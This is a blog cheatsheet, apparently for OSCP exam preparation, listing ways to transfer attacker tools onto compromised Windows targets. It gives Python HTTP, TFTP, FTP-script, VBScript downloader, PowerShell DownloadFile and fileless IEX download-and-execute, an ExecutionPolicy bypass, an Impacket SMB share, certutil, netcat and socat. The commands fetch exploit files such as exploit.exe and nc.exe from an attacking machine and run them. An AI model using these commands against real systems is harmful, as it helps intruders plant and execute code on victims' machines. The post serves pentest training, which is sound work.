OSCP Blog Series – OSCP Cheatsheet – Windows File Transfer Techniques

OSCP Cheatsheet - Windows File Transfer Techniques

This post will cover the windows file transfer techniques. This is not only useful for OSCP but can also be used in the regular penetration testing exercises. File transfer plays a crucial role in post exploitation phase such as transferring our exploits, other tools required for analyzing and looting the machine. In OSCP exercises or regular pentesting assignments, sometime we get initial foothold on the target system but escalating the privileges become difficult to get root/system level access. In such scenarios manual analysis is one of the option but considering the time constraints in OSCP exam or any of the pentesting exercises we need something which can automate this basic analysis process and save our time. In order to do that we need certain ready to go tools in our system and for that we need to transfer the tools to the target system.

Transferring files to Linux is easier as compare to windows as in most of the cases Linux have netcat, wget, curl and other utilities by default. But when it comes to windows we don’t have such utilities installed. Either we have to install these or have to work around Powershell, FTP, and other core windows based programs.

So below are some of the file transfer techniques which can be used against windows based targets.

Kali Machine(Attacking machine)- We need to start the http server to serve the files so that other system can access it.

HTTP Server

python -m SimpleHTTPServer 80
python -m http.server 80


TFTP can be used to transfer files to/from older Windows OS.

By default installed on : Up to Windows XP and 2003.
By default not installed on : Windows 7, Windows 2008, and newer.

apt update && sudo apt install atftp
mkdir /tftp
chown nobody: /tftp
atftpd --daemon --port 69 /tftp

tftp -i PUT file1.txt
tftp -i GET file2.txt


The below method can be used to transfer file from Linux to Windows. Similar technique can also be used to transfer file from WIndows to Linux but with a little trick.

Place your file(nc.exe in this case)ftphome directory on target linux
Replace the username/password in below with your FTP username/password.

Linux System(Attacking machine)
echo open 21> file.txt
echo USER username>> file.txt
echo password>> file.txt
echo bin >> file.txt
echo GET nc.exe >> file.txt
echo bye >> file.txt

Windows (Target machine)
ftp -v -n -s:file.txt

Downloads/Transfer file on/to Windows system using scripting language.

VBScript(XP, 2003)

In this first we will echo all these commands in a file wget.vbs
If you are creating this file on windows then it will work fine.
If creating on Linux and then transferring to windows then you may face issue sometime, use unix2dos before you transfer it in this case.

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

Using wget.vbs

cscript wget.vbs xyz.txt

Powershell(Win 7, 2008 and above)

A – If you have fully interactive Powershell session.

Download file
powershell.exe (New-Object System.Net.WebClient).DownloadFile('', 'exploit.exe')

Download and execute without saving on disk
powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('')

B – If there is no interactive Powershell session.

If we don’t have fully interactive shell to launch Powershell we need to create a powershell script and run as a file.

echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "" >>wget.ps1
echo $file = "exploit1-ouput.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1

Finally we can call and run the ps file using below
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1


Use smbserver.py from Impacket.
python smbserver.py ROPNOP /root/yogesh

Put any files within /root/yogesh folder (exploit.exe in this case)

copy \\ROPNOP\exploit.exe .


Start python http server on Attacker machine

Run below command on Windows(Target)
certutil.exe -urlcache -split -f ""

If anyhow you get Netcat, Socat, Wget, Curl on windows then below commands can be used for file transfer.


nc -nlvp 4444 > outputfile.exe

nc -nv 4444 < /usr/inputfile.exe


socat TCP4-LISTEN:443,fork file:file.txt

socat TCP4: file:file.txt,create


python -m http.server 80 (On the same directory where file is available)



python -m http.server 80 (On the same directory where file is available)

curl -o exploit.exe

Author: Yogesh Prasad

Information Security Professional | Cyber Security Expert | Ethical Hacker | Founder – Hackers Interview

Leave a Reply

Your email address will not be published. Required fields are marked *

Subscribe Us

You have successfully subscribed to Hackers Interview

There was an error while trying to send your request. Please try again.

HACKERS INTERVIEW will use the information you provide on this form to be in touch with you and to provide updates and marketing.